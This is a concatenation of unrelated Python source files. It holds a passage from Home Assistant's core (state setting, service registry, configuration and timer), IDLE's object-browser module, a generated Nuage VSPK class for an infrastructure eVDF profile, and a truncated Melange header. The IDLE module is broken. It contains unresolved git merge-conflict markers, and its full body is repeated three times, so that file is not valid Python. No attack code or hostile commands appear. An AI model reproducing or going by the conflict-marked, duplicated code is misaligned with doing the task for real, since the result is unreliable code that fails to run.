self,
entity_id: str,
new_state: str,
attributes: Optional[Dict] = None,
force_update: bool = False,
context: Optional[Context] = None,
) -> None:
"""Set the state of an entity, add entity if it does not exist.
Attributes is an optional dict to specify attributes of this state.
If you just update the attributes and not the state, last changed will
not be affected.
This method must be run in the event loop.
"""
entity_id = entity_id.lower()
new_state = str(new_state)
attributes = attributes or {}
old_state = self._states.get(entity_id)
if old_state is None:
same_state = False
same_attr = False
last_changed = None
else:
same_state = old_state.state == new_state and not force_update
same_attr = old_state.attributes == MappingProxyType(attributes)
last_changed = old_state.last_changed if same_state else None
if same_state and same_attr:
return
if context is None:
context = Context()
state = State(entity_id, new_state, attributes, last_changed, None, context)
self._states[entity_id] = state
self._bus.async_fire(
EVENT_STATE_CHANGED,
{"entity_id": entity_id, "old_state": old_state, "new_state": state},
EventOrigin.local,
context,
)
class Service:
"""Representation of a callable service."""
__slots__ = ["func", "schema", "is_callback", "is_coroutinefunction"]
def __init__(
self,
func: Callable,
schema: Optional[vol.Schema],
context: Optional[Context] = None,
) -> None:
"""Initialize a service."""
self.func = func
self.schema = schema
# Properly detect wrapped functions
while isinstance(func, functools.partial):
func = func.func
self.is_callback = is_callback(func)
self.is_coroutinefunction = asyncio.iscoroutinefunction(func)
class ServiceCall:
"""Representation of a call to a service."""
__slots__ = ["domain", "service", "data", "context"]
def __init__(
self,
domain: str,
service: str,
data: Optional[Dict] = None,
context: Optional[Context] = None,
) -> None:
"""Initialize a service call."""
self.domain = domain.lower()
self.service = service.lower()
self.data = MappingProxyType(data or {})
self.context = context or Context()
def __repr__(self) -> str:
"""Return the representation of the service."""
if self.data:
return "<ServiceCall {}.{} (c:{}): {}>".format(
self.domain, self.service, self.context.id, util.repr_helper(self.data)
)
return f"<ServiceCall {self.domain}.{self.service} (c:{self.context.id})>"
class ServiceRegistry:
"""Offer the services over the eventbus."""
def __init__(self, hass: HomeAssistant) -> None:
"""Initialize a service registry."""
self._services: Dict[str, Dict[str, Service]] = {}
self._hass = hass
@property
def services(self) -> Dict[str, Dict[str, Service]]:
"""Return dictionary with per domain a list of available services."""
return run_callback_threadsafe( # type: ignore
self._hass.loop, self.async_services
).result()
@callback
def async_services(self) -> Dict[str, Dict[str, Service]]:
"""Return dictionary with per domain a list of available services.
This method must be run in the event loop.
"""
return {domain: self._services[domain].copy() for domain in self._services}
def has_service(self, domain: str, service: str) -> bool:
"""Test if specified service exists.
Async friendly.
"""
return service.lower() in self._services.get(domain.lower(), [])
def register(
self,
domain: str,
service: str,
service_func: Callable,
schema: Optional[vol.Schema] = None,
) -> None:
"""
Register a service.
Schema is called to coerce and validate the service data.
"""
run_callback_threadsafe(
self._hass.loop, self.async_register, domain, service, service_func, schema
).result()
@callback
def async_register(
self,
domain: str,
service: str,
service_func: Callable,
schema: Optional[vol.Schema] = None,
) -> None:
"""
Register a service.
Schema is called to coerce and validate the service data.
This method must be run in the event loop.
"""
domain = domain.lower()
service = service.lower()
service_obj = Service(service_func, schema)
if domain in self._services:
self._services[domain][service] = service_obj
else:
self._services[domain] = {service: service_obj}
self._hass.bus.async_fire(
EVENT_SERVICE_REGISTERED, {ATTR_DOMAIN: domain, ATTR_SERVICE: service}
)
def remove(self, domain: str, service: str) -> None:
"""Remove a registered service from service handler."""
run_callback_threadsafe(
self._hass.loop, self.async_remove, domain, service
).result()
@callback
def async_remove(self, domain: str, service: str) -> None:
"""Remove a registered service from service handler.
This method must be run in the event loop.
"""
domain = domain.lower()
service = service.lower()
if service not in self._services.get(domain, {}):
_LOGGER.warning("Unable to remove unknown service %s/%s.", domain, service)
return
self._services[domain].pop(service)
if not self._services[domain]:
self._services.pop(domain)
self._hass.bus.async_fire(
EVENT_SERVICE_REMOVED, {ATTR_DOMAIN: domain, ATTR_SERVICE: service}
)
def call(
self,
domain: str,
service: str,
service_data: Optional[Dict] = None,
blocking: bool = False,
context: Optional[Context] = None,
) -> Optional[bool]:
"""
Call a service.
Specify blocking=True to wait till service is executed.
Waits a maximum of SERVICE_CALL_LIMIT.
If blocking = True, will return boolean if service executed
successfully within SERVICE_CALL_LIMIT.
This method will fire an event to call the service.
This event will be picked up by this ServiceRegistry and any
other ServiceRegistry that is listening on the EventBus.
Because the service is sent as an event you are not allowed to use
the keys ATTR_DOMAIN and ATTR_SERVICE in your service_data.
"""
return asyncio.run_coroutine_threadsafe(
self.async_call(domain, service, service_data, blocking, context),
self._hass.loop,
).result()
async def async_call(
self,
domain: str,
service: str,
service_data: Optional[Dict] = None,
blocking: bool = False,
context: Optional[Context] = None,
) -> Optional[bool]:
"""
Call a service.
Specify blocking=True to wait till service is executed.
Waits a maximum of SERVICE_CALL_LIMIT.
If blocking = True, will return boolean if service executed
successfully within SERVICE_CALL_LIMIT.
This method will fire an event to call the service.
This event will be picked up by this ServiceRegistry and any
other ServiceRegistry that is listening on the EventBus.
Because the service is sent as an event you are not allowed to use
the keys ATTR_DOMAIN and ATTR_SERVICE in your service_data.
This method is a coroutine.
"""
domain = domain.lower()
service = service.lower()
context = context or Context()
service_data = service_data or {}
try:
handler = self._services[domain][service]
except KeyError:
raise ServiceNotFound(domain, service) from None
if handler.schema:
processed_data = handler.schema(service_data)
else:
processed_data = service_data
service_call = ServiceCall(domain, service, processed_data, context)
self._hass.bus.async_fire(
EVENT_CALL_SERVICE,
{
ATTR_DOMAIN: domain.lower(),
ATTR_SERVICE: service.lower(),
ATTR_SERVICE_DATA: service_data,
},
context=context,
)
if not blocking:
self._hass.async_create_task(self._safe_execute(handler, service_call))
return None
try:
with timeout(SERVICE_CALL_LIMIT):
await asyncio.shield(self._execute_service(handler, service_call))
return True
except asyncio.TimeoutError:
return False
async def _safe_execute(self, handler: Service, service_call: ServiceCall) -> None:
"""Execute a service and catch exceptions."""
try:
await self._execute_service(handler, service_call)
except Unauthorized:
_LOGGER.warning(
"Unauthorized service called %s/%s",
service_call.domain,
service_call.service,
)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Error executing service %s", service_call)
async def _execute_service(
self, handler: Service, service_call: ServiceCall
) -> None:
"""Execute a service."""
if handler.is_callback:
handler.func(service_call)
elif handler.is_coroutinefunction:
await handler.func(service_call)
else:
await self._hass.async_add_executor_job(handler.func, service_call)
class Config:
"""Configuration settings for Home Assistant."""
def __init__(self, hass: HomeAssistant) -> None:
"""Initialize a new config object."""
self.hass = hass
self.latitude: float = 0
self.longitude: float = 0
self.elevation: int = 0
self.location_name: str = "Home"
self.time_zone: datetime.tzinfo = dt_util.UTC
self.units: UnitSystem = METRIC_SYSTEM
self.config_source: str = "default"
# If True, pip install is skipped for requirements on startup
self.skip_pip: bool = False
# List of loaded components
self.components: Set[str] = set()
# API (HTTP) server configuration, see components.http.ApiConfig
self.api: Optional[Any] = None
# Directory that holds the configuration
self.config_dir: Optional[str] = None
# List of allowed external dirs to access
self.whitelist_external_dirs: Set[str] = set()
def distance(self, lat: float, lon: float) -> Optional[float]:
"""Calculate distance from Home Assistant.
Async friendly.
"""
return self.units.length(
location.distance(self.latitude, self.longitude, lat, lon), "m"
)
def path(self, *path: str) -> str:
"""Generate path to the file within the configuration directory.
Async friendly.
"""
if self.config_dir is None:
raise HomeAssistantError("config_dir is not set")
return os.path.join(self.config_dir, *path)
def is_allowed_path(self, path: str) -> bool:
"""Check if the path is valid for access from outside."""
assert path is not None
thepath = pathlib.Path(path)
try:
# The file path does not have to exist (it's parent should)
if thepath.exists():
thepath = thepath.resolve()
else:
thepath = thepath.parent.resolve()
except (FileNotFoundError, RuntimeError, PermissionError):
return False
for whitelisted_path in self.whitelist_external_dirs:
try:
thepath.relative_to(whitelisted_path)
return True
except ValueError:
pass
return False
def as_dict(self) -> Dict:
"""Create a dictionary representation of the configuration.
Async friendly.
"""
time_zone = dt_util.UTC.zone
if self.time_zone and getattr(self.time_zone, "zone"):
time_zone = getattr(self.time_zone, "zone")
return {
"latitude": self.latitude,
"longitude": self.longitude,
"elevation": self.elevation,
"unit_system": self.units.as_dict(),
"location_name": self.location_name,
"time_zone": time_zone,
"components": self.components,
"config_dir": self.config_dir,
"whitelist_external_dirs": self.whitelist_external_dirs,
"version": __version__,
"config_source": self.config_source,
}
def set_time_zone(self, time_zone_str: str) -> None:
"""Help to set the time zone."""
time_zone = dt_util.get_time_zone(time_zone_str)
if time_zone:
self.time_zone = time_zone
dt_util.set_default_time_zone(time_zone)
else:
raise ValueError(f"Received invalid time zone {time_zone_str}")
@callback
def _update(
self,
*,
source: str,
latitude: Optional[float] = None,
longitude: Optional[float] = None,
elevation: Optional[int] = None,
unit_system: Optional[str] = None,
location_name: Optional[str] = None,
time_zone: Optional[str] = None,
) -> None:
"""Update the configuration from a dictionary."""
self.config_source = source
if latitude is not None:
self.latitude = latitude
if longitude is not None:
self.longitude = longitude
if elevation is not None:
self.elevation = elevation
if unit_system is not None:
if unit_system == CONF_UNIT_SYSTEM_IMPERIAL:
self.units = IMPERIAL_SYSTEM
else:
self.units = METRIC_SYSTEM
if location_name is not None:
self.location_name = location_name
if time_zone is not None:
self.set_time_zone(time_zone)
async def async_update(self, **kwargs: Any) -> None:
"""Update the configuration from a dictionary."""
self._update(source=SOURCE_STORAGE, **kwargs)
await self.async_store()
self.hass.bus.async_fire(EVENT_CORE_CONFIG_UPDATE, kwargs)
async def async_load(self) -> None:
"""Load [homeassistant] core config."""
store = self.hass.helpers.storage.Store(
CORE_STORAGE_VERSION, CORE_STORAGE_KEY, private=True
)
data = await store.async_load()
if not data:
return
self._update(source=SOURCE_STORAGE, **data)
async def async_store(self) -> None:
"""Store [homeassistant] core config."""
time_zone = dt_util.UTC.zone
if self.time_zone and getattr(self.time_zone, "zone"):
time_zone = getattr(self.time_zone, "zone")
data = {
"latitude": self.latitude,
"longitude": self.longitude,
"elevation": self.elevation,
"unit_system": self.units.name,
"location_name": self.location_name,
"time_zone": time_zone,
}
store = self.hass.helpers.storage.Store(
CORE_STORAGE_VERSION, CORE_STORAGE_KEY, private=True
)
await store.async_save(data)
def _async_create_timer(hass: HomeAssistant) -> None:
"""Create a timer that will start on HOMEASSISTANT_START."""
handle = None
def schedule_tick(now: datetime.datetime) -> None:
"""Schedule a timer tick when the next second rolls around."""
nonlocal handle
slp_seconds = 1 - (now.microsecond / 10 ** 6)
target = monotonic() + slp_seconds
handle = hass.loop.call_later(slp_seconds, fire_time_event, target)
@callback
def fire_time_event(target: float) -> None:
"""Fire next time event."""
now = dt_util.utcnow()
hass.bus.async_fire(EVENT_TIME_CHANGED, {ATTR_NOW: now})
# If we are more than a second late, a tick was missed
late = monotonic() - target
if late > 1:
hass.bus.async_fire(EVENT_TIMER_OUT_OF_SYNC, {ATTR_SECONDS: late})
schedule_tick(now)
@callback
def stop_timer(_: Event) -> None:
"""Stop the timer."""
if handle is not None:
handle.cancel()
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_timer)
_LOGGER.info("Timer:starting")
schedule_tick(dt_util.utcnow())
| |
<<<<<<< HEAD
<<<<<<< HEAD
# XXX TO DO:
# - popup menu
# - support partial or total redisplay
# - more doc strings
# - tooltips
# object browser
# XXX TO DO:
# - for classes/modules, add "open source" to object browser
import re
from idlelib.TreeWidget import TreeItem, TreeNode, ScrolledCanvas
from reprlib import Repr
myrepr = Repr()
myrepr.maxstring = 100
myrepr.maxother = 100
class ObjectTreeItem(TreeItem):
def __init__(self, labeltext, object, setfunction=None):
self.labeltext = labeltext
self.object = object
self.setfunction = setfunction
def GetLabelText(self):
return self.labeltext
def GetText(self):
return myrepr.repr(self.object)
def GetIconName(self):
if not self.IsExpandable():
return "python"
def IsEditable(self):
return self.setfunction is not None
def SetText(self, text):
try:
value = eval(text)
self.setfunction(value)
except:
pass
else:
self.object = value
def IsExpandable(self):
return not not dir(self.object)
def GetSubList(self):
keys = dir(self.object)
sublist = []
for key in keys:
try:
value = getattr(self.object, key)
except AttributeError:
continue
item = make_objecttreeitem(
str(key) + " =",
value,
lambda value, key=key, object=self.object:
setattr(object, key, value))
sublist.append(item)
return sublist
class ClassTreeItem(ObjectTreeItem):
def IsExpandable(self):
return True
def GetSubList(self):
sublist = ObjectTreeItem.GetSubList(self)
if len(self.object.__bases__) == 1:
item = make_objecttreeitem("__bases__[0] =",
self.object.__bases__[0])
else:
item = make_objecttreeitem("__bases__ =", self.object.__bases__)
sublist.insert(0, item)
return sublist
class AtomicObjectTreeItem(ObjectTreeItem):
def IsExpandable(self):
return 0
class SequenceTreeItem(ObjectTreeItem):
def IsExpandable(self):
return len(self.object) > 0
def keys(self):
return range(len(self.object))
def GetSubList(self):
sublist = []
for key in self.keys():
try:
value = self.object[key]
except KeyError:
continue
def setfunction(value, key=key, object=self.object):
object[key] = value
item = make_objecttreeitem("%r:" % (key,), value, setfunction)
sublist.append(item)
return sublist
class DictTreeItem(SequenceTreeItem):
def keys(self):
keys = list(self.object.keys())
try:
keys.sort()
except:
pass
return keys
dispatch = {
int: AtomicObjectTreeItem,
float: AtomicObjectTreeItem,
str: AtomicObjectTreeItem,
tuple: SequenceTreeItem,
list: SequenceTreeItem,
dict: DictTreeItem,
type: ClassTreeItem,
}
def make_objecttreeitem(labeltext, object, setfunction=None):
t = type(object)
if t in dispatch:
c = dispatch[t]
else:
c = ObjectTreeItem
return c(labeltext, object, setfunction)
def _object_browser(parent):
import sys
from tkinter import Tk
root = Tk()
root.title("Test ObjectBrowser")
width, height, x, y = list(map(int, re.split('[x+]', parent.geometry())))
root.geometry("+%d+%d"%(x, y + 150))
root.configure(bd=0, bg="yellow")
root.focus_set()
sc = ScrolledCanvas(root, bg="white", highlightthickness=0, takefocus=1)
sc.frame.pack(expand=1, fill="both")
item = make_objecttreeitem("sys", sys)
node = TreeNode(sc.canvas, None, item)
node.update()
root.mainloop()
if __name__ == '__main__':
from idlelib.idle_test.htest import run
run(_object_browser)
=======
# XXX TO DO:
# - popup menu
# - support partial or total redisplay
# - more doc strings
# - tooltips
# object browser
# XXX TO DO:
# - for classes/modules, add "open source" to object browser
import re
from idlelib.TreeWidget import TreeItem, TreeNode, ScrolledCanvas
from reprlib import Repr
myrepr = Repr()
myrepr.maxstring = 100
myrepr.maxother = 100
class ObjectTreeItem(TreeItem):
def __init__(self, labeltext, object, setfunction=None):
self.labeltext = labeltext
self.object = object
self.setfunction = setfunction
def GetLabelText(self):
return self.labeltext
def GetText(self):
return myrepr.repr(self.object)
def GetIconName(self):
if not self.IsExpandable():
return "python"
def IsEditable(self):
return self.setfunction is not None
def SetText(self, text):
try:
value = eval(text)
self.setfunction(value)
except:
pass
else:
self.object = value
def IsExpandable(self):
return not not dir(self.object)
def GetSubList(self):
keys = dir(self.object)
sublist = []
for key in keys:
try:
value = getattr(self.object, key)
except AttributeError:
continue
item = make_objecttreeitem(
str(key) + " =",
value,
lambda value, key=key, object=self.object:
setattr(object, key, value))
sublist.append(item)
return sublist
class ClassTreeItem(ObjectTreeItem):
def IsExpandable(self):
return True
def GetSubList(self):
sublist = ObjectTreeItem.GetSubList(self)
if len(self.object.__bases__) == 1:
item = make_objecttreeitem("__bases__[0] =",
self.object.__bases__[0])
else:
item = make_objecttreeitem("__bases__ =", self.object.__bases__)
sublist.insert(0, item)
return sublist
class AtomicObjectTreeItem(ObjectTreeItem):
def IsExpandable(self):
return 0
class SequenceTreeItem(ObjectTreeItem):
def IsExpandable(self):
return len(self.object) > 0
def keys(self):
return range(len(self.object))
def GetSubList(self):
sublist = []
for key in self.keys():
try:
value = self.object[key]
except KeyError:
continue
def setfunction(value, key=key, object=self.object):
object[key] = value
item = make_objecttreeitem("%r:" % (key,), value, setfunction)
sublist.append(item)
return sublist
class DictTreeItem(SequenceTreeItem):
def keys(self):
keys = list(self.object.keys())
try:
keys.sort()
except:
pass
return keys
dispatch = {
int: AtomicObjectTreeItem,
float: AtomicObjectTreeItem,
str: AtomicObjectTreeItem,
tuple: SequenceTreeItem,
list: SequenceTreeItem,
dict: DictTreeItem,
type: ClassTreeItem,
}
def make_objecttreeitem(labeltext, object, setfunction=None):
t = type(object)
if t in dispatch:
c = dispatch[t]
else:
c = ObjectTreeItem
return c(labeltext, object, setfunction)
def _object_browser(parent):
import sys
from tkinter import Tk
root = Tk()
root.title("Test ObjectBrowser")
width, height, x, y = list(map(int, re.split('[x+]', parent.geometry())))
root.geometry("+%d+%d"%(x, y + 150))
root.configure(bd=0, bg="yellow")
root.focus_set()
sc = ScrolledCanvas(root, bg="white", highlightthickness=0, takefocus=1)
sc.frame.pack(expand=1, fill="both")
item = make_objecttreeitem("sys", sys)
node = TreeNode(sc.canvas, None, item)
node.update()
root.mainloop()
if __name__ == '__main__':
from idlelib.idle_test.htest import run
run(_object_browser)
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
=======
# XXX TO DO:
# - popup menu
# - support partial or total redisplay
# - more doc strings
# - tooltips
# object browser
# XXX TO DO:
# - for classes/modules, add "open source" to object browser
import re
from idlelib.TreeWidget import TreeItem, TreeNode, ScrolledCanvas
from reprlib import Repr
myrepr = Repr()
myrepr.maxstring = 100
myrepr.maxother = 100
class ObjectTreeItem(TreeItem):
def __init__(self, labeltext, object, setfunction=None):
self.labeltext = labeltext
self.object = object
self.setfunction = setfunction
def GetLabelText(self):
return self.labeltext
def GetText(self):
return myrepr.repr(self.object)
def GetIconName(self):
if not self.IsExpandable():
return "python"
def IsEditable(self):
return self.setfunction is not None
def SetText(self, text):
try:
value = eval(text)
self.setfunction(value)
except:
pass
else:
self.object = value
def IsExpandable(self):
return not not dir(self.object)
def GetSubList(self):
keys = dir(self.object)
sublist = []
for key in keys:
try:
value = getattr(self.object, key)
except AttributeError:
continue
item = make_objecttreeitem(
str(key) + " =",
value,
lambda value, key=key, object=self.object:
setattr(object, key, value))
sublist.append(item)
return sublist
class ClassTreeItem(ObjectTreeItem):
def IsExpandable(self):
return True
def GetSubList(self):
sublist = ObjectTreeItem.GetSubList(self)
if len(self.object.__bases__) == 1:
item = make_objecttreeitem("__bases__[0] =",
self.object.__bases__[0])
else:
item = make_objecttreeitem("__bases__ =", self.object.__bases__)
sublist.insert(0, item)
return sublist
class AtomicObjectTreeItem(ObjectTreeItem):
def IsExpandable(self):
return 0
class SequenceTreeItem(ObjectTreeItem):
def IsExpandable(self):
return len(self.object) > 0
def keys(self):
return range(len(self.object))
def GetSubList(self):
sublist = []
for key in self.keys():
try:
value = self.object[key]
except KeyError:
continue
def setfunction(value, key=key, object=self.object):
object[key] = value
item = make_objecttreeitem("%r:" % (key,), value, setfunction)
sublist.append(item)
return sublist
class DictTreeItem(SequenceTreeItem):
def keys(self):
keys = list(self.object.keys())
try:
keys.sort()
except:
pass
return keys
dispatch = {
int: AtomicObjectTreeItem,
float: AtomicObjectTreeItem,
str: AtomicObjectTreeItem,
tuple: SequenceTreeItem,
list: SequenceTreeItem,
dict: DictTreeItem,
type: ClassTreeItem,
}
def make_objecttreeitem(labeltext, object, setfunction=None):
t = type(object)
if t in dispatch:
c = dispatch[t]
else:
c = ObjectTreeItem
return c(labeltext, object, setfunction)
def _object_browser(parent):
import sys
from tkinter import Tk
root = Tk()
root.title("Test ObjectBrowser")
width, height, x, y = list(map(int, re.split('[x+]', parent.geometry())))
root.geometry("+%d+%d"%(x, y + 150))
root.configure(bd=0, bg="yellow")
root.focus_set()
sc = ScrolledCanvas(root, bg="white", highlightthickness=0, takefocus=1)
sc.frame.pack(expand=1, fill="both")
item = make_objecttreeitem("sys", sys)
node = TreeNode(sc.canvas, None, item)
node.update()
root.mainloop()
if __name__ == '__main__':
from idlelib.idle_test.htest import run
run(_object_browser)
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
| |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUMetadatasFetcher
from .fetchers import NUGlobalMetadatasFetcher
from bambou import NURESTObject
class NUInfrastructureEVDFProfile(NURESTObject):
""" Represents a InfrastructureEVDFProfile in the VSD
Notes:
An Infrastructure eVDF Profile instance contains common parameters used to bootstrap instances of eVDF (encryption enabled virtual distributed firewall).
"""
__rest_name__ = "infrastructureevdfprofile"
__resource_name__ = "infrastructureevdfprofiles"
## Constants
CONST_NUAGE_PLATFORM_KVM = "KVM"
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_NUAGE_PLATFORM_KVM_LXC = "KVM_LXC"
CONST_NUAGE_PLATFORM_KVM_K8S = "KVM_K8S"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
def __init__(self, **kwargs):
""" Initializes a InfrastructureEVDFProfile instance
Notes:
You can specify all parameters while calling this methods.
A special argument named `data` will enable you to load the
object from a Python dictionary
Examples:
>>> infrastructureevdfprofile = NUInfrastructureEVDFProfile(id=u'xxxx-xxx-xxx-xxx', name=u'InfrastructureEVDFProfile')
>>> infrastructureevdfprofile = NUInfrastructureEVDFProfile(data=my_dict)
"""
super(NUInfrastructureEVDFProfile, self).__init__()
# Read/Write Attributes
self._ntp_server_key = None
self._ntp_server_key_id = None
self._name = None
self._last_updated_by = None
self._active_controller = None
self._service_ipv4_subnet = None
self._description = None
self._enterprise_id = None
self._entity_scope = None
self._proxy_dns_name = None
self._use_two_factor = None
self._standby_controller = None
self._nuage_platform = None
self._external_id = None
self.expose_attribute(local_name="ntp_server_key", remote_name="NTPServerKey", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="ntp_server_key_id", remote_name="NTPServerKeyID", attribute_type=int, is_required=False, is_unique=False)
self.expose_attribute(local_name="name", remote_name="name", attribute_type=str, is_required=True, is_unique=False)
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="active_controller", remote_name="activeController", attribute_type=str, is_required=True, is_unique=False)
self.expose_attribute(local_name="service_ipv4_subnet", remote_name="serviceIPv4Subnet", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="description", remote_name="description", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="enterprise_id", remote_name="enterpriseID", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="proxy_dns_name", remote_name="proxyDNSName", attribute_type=str, is_required=True, is_unique=False)
self.expose_attribute(local_name="use_two_factor", remote_name="useTwoFactor", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="standby_controller", remote_name="standbyController", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="nuage_platform", remote_name="nuagePlatform", attribute_type=str, is_required=False, is_unique=False, choices=[u'KVM', u'KVM_K8S', u'KVM_LXC'])
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
# Fetchers
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
# Properties
@property
def ntp_server_key(self):
""" Get ntp_server_key value.
Notes:
If set, this represents the security key for the Gateway to communicate with the NTP server (a VSC).
This attribute is named `NTPServerKey` in VSD API.
"""
return self._ntp_server_key
@ntp_server_key.setter
def ntp_server_key(self, value):
""" Set ntp_server_key value.
Notes:
If set, this represents the security key for the Gateway to communicate with the NTP server (a VSC).
This attribute is named `NTPServerKey` in VSD API.
"""
self._ntp_server_key = value
@property
def ntp_server_key_id(self):
""" Get ntp_server_key_id value.
Notes:
Corresponds to the key ID on the NTP server that matches the NTPServerKey value. Valid values are from 1 to 255 as specified by SR-OS and when value 0 is entered, it means that the NTP Key is not used (VSD/NSG only).
This attribute is named `NTPServerKeyID` in VSD API.
"""
return self._ntp_server_key_id
@ntp_server_key_id.setter
def ntp_server_key_id(self, value):
""" Set ntp_server_key_id value.
Notes:
Corresponds to the key ID on the NTP server that matches the NTPServerKey value. Valid values are from 1 to 255 as specified by SR-OS and when value 0 is entered, it means that the NTP Key is not used (VSD/NSG only).
This attribute is named `NTPServerKeyID` in VSD API.
"""
self._ntp_server_key_id = value
@property
def name(self):
""" Get name value.
Notes:
The name of the profile instance.
"""
return self._name
@name.setter
def name(self, value):
""" Set name value.
Notes:
The name of the profile instance.
"""
self._name = value
@property
def last_updated_by(self):
""" Get last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
""" Set last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
self._last_updated_by = value
@property
def active_controller(self):
""" Get active_controller value.
Notes:
The IP address of the active Controller (VSC)
This attribute is named `activeController` in VSD API.
"""
return self._active_controller
@active_controller.setter
def active_controller(self, value):
""" Set active_controller value.
Notes:
The IP address of the active Controller (VSC)
This attribute is named `activeController` in VSD API.
"""
self._active_controller = value
@property
def service_ipv4_subnet(self):
""" Get service_ipv4_subnet value.
Notes:
K8 Service IPv4 Subnet
This attribute is named `serviceIPv4Subnet` in VSD API.
"""
return self._service_ipv4_subnet
@service_ipv4_subnet.setter
def service_ipv4_subnet(self, value):
""" Set service_ipv4_subnet value.
Notes:
K8 Service IPv4 Subnet
This attribute is named `serviceIPv4Subnet` in VSD API.
"""
self._service_ipv4_subnet = value
@property
def description(self):
""" Get description value.
Notes:
A brief description of the infrastructure profile.
"""
return self._description
@description.setter
def description(self, value):
""" Set description value.
Notes:
A brief description of the infrastructure profile.
"""
self._description = value
@property
def enterprise_id(self):
""" Get enterprise_id value.
Notes:
Enterprise/Organisation associated with this Profile instance.
This attribute is named `enterpriseID` in VSD API.
"""
return self._enterprise_id
@enterprise_id.setter
def enterprise_id(self, value):
""" Set enterprise_id value.
Notes:
Enterprise/Organisation associated with this Profile instance.
This attribute is named `enterpriseID` in VSD API.
"""
self._enterprise_id = value
@property
def entity_scope(self):
""" Get entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
""" Set entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
self._entity_scope = value
@property
def proxy_dns_name(self):
""" Get proxy_dns_name value.
Notes:
The DNS name of the proxy device acting as an entry point of eVDF instances to contact VSD.
This attribute is named `proxyDNSName` in VSD API.
"""
return self._proxy_dns_name
@proxy_dns_name.setter
def proxy_dns_name(self, value):
""" Set proxy_dns_name value.
Notes:
The DNS name of the proxy device acting as an entry point of eVDF instances to contact VSD.
This attribute is named `proxyDNSName` in VSD API.
"""
self._proxy_dns_name = value
@property
def use_two_factor(self):
""" Get use_two_factor value.
Notes:
A flag that indicates if two-factor is enabled or not when gateway instances inheriting from this profile are bootstrapped.
This attribute is named `useTwoFactor` in VSD API.
"""
return self._use_two_factor
@use_two_factor.setter
def use_two_factor(self, value):
""" Set use_two_factor value.
Notes:
A flag that indicates if two-factor is enabled or not when gateway instances inheriting from this profile are bootstrapped.
This attribute is named `useTwoFactor` in VSD API.
"""
self._use_two_factor = value
@property
def standby_controller(self):
""" Get standby_controller value.
Notes:
The IP address of the standby Controller (VSC)
This attribute is named `standbyController` in VSD API.
"""
return self._standby_controller
@standby_controller.setter
def standby_controller(self, value):
""" Set standby_controller value.
Notes:
The IP address of the standby Controller (VSC)
This attribute is named `standbyController` in VSD API.
"""
self._standby_controller = value
@property
def nuage_platform(self):
""" Get nuage_platform value.
Notes:
The Hypervisor Platform
This attribute is named `nuagePlatform` in VSD API.
"""
return self._nuage_platform
@nuage_platform.setter
def nuage_platform(self, value):
""" Set nuage_platform value.
Notes:
The Hypervisor Platform
This attribute is named `nuagePlatform` in VSD API.
"""
self._nuage_platform = value
@property
def external_id(self):
""" Get external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
return self._external_id
@external_id.setter
def external_id(self, value):
""" Set external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
self._external_id = value
| |
#!/usr/bin/env python2.5
#
# Copyright 2009 the Melange authors.
#
